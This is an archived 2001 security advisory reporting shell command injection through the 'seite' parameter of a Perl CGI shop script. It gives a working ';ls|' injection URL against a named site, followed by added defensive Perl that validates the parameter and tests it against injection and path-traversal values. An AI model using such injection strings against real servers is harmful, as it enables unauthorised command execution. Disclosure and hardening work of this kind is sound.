------------[ advisory ]------------

name: (e)shop Online-Shop System
author: WEBDISCOUNT, Inh. Michael Boehme

Problem: The script doesn't check for the symbol ";". Any user can execute any *nix commands on the webserver.

exploit: host/cgi-bin/eshop.pl?seite=;ls|
ex. http://www.azl-mobilfunk.com/cgi-bin/eshop.pl?seite=;ls|

Bug found by Kernel|X| [ twisted metal ]
E-Mail: [secureat_private] [kernelxat_private]
WWW: [ www.tmgroup.sh ]

------------
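Added example, not part of the original advisory and not code from eshop.pl: one way a Perl CGI script can handle a page parameter such as "seite" so that ";" and "|" never reach a shell. It assumes the parameter ends up in a file open; the function names, the ".html" suffix and the directory layout are hypothetical.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempdir);

# Assumed vulnerable pattern (an assumption, not taken from eshop.pl):
#   open(PAGE, "$dir/$seite");
# Two-argument open() treats a trailing "|" as "run this as a command",
# so a value such as ";ls|" is handed to the shell.

# Allow-list: 1-32 letters, digits, "_" or "-". Values containing ";", "|",
# "/", ".", whitespace or NUL are rejected outright, never "cleaned".
# \A and \z anchor the whole string, so a trailing newline does not pass.
sub valid_page_name {
    my ($name) = @_;
    return 0 unless defined $name;
    return $name =~ /\A[A-Za-z0-9_-]{1,32}\z/ ? 1 : 0;
}

# Three-argument open() fixes the mode to "<": the file name is never
# parsed for pipe or redirection characters. The ".html" suffix and the
# directory layout are hypothetical.
sub read_page {
    my ($dir, $name) = @_;
    return unless valid_page_name($name);
    open(my $fh, '<', "$dir/$name.html") or return;
    local $/;    # slurp mode
    my $body = <$fh>;
    close $fh;
    return $body;
}

# Constructed demo: a temporary page directory with a single page.
my $dir = tempdir(CLEANUP => 1);
open(my $out, '>', "$dir/start.html") or die "cannot write sample page: $!";
print {$out} "<h1>Start</h1>\n";
close $out;

# Constructed sample values for the "seite" parameter.
for my $seite ('start', ';ls|', '../../etc/passwd', "start\n", 'missing') {
    my $body = read_page($dir, $seite);
    (my $shown = $seite) =~ s/\n/\\n/g;
    printf "%-20s %s\n", "'$shown'", defined $body ? 'served' : 'refused';
}
```

Only 'start' is served; the other four values are refused before any file or process is opened.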
This archive was generated by hypermail 2b30 : Sun Sep 16 2001 - 17:25:59 PDT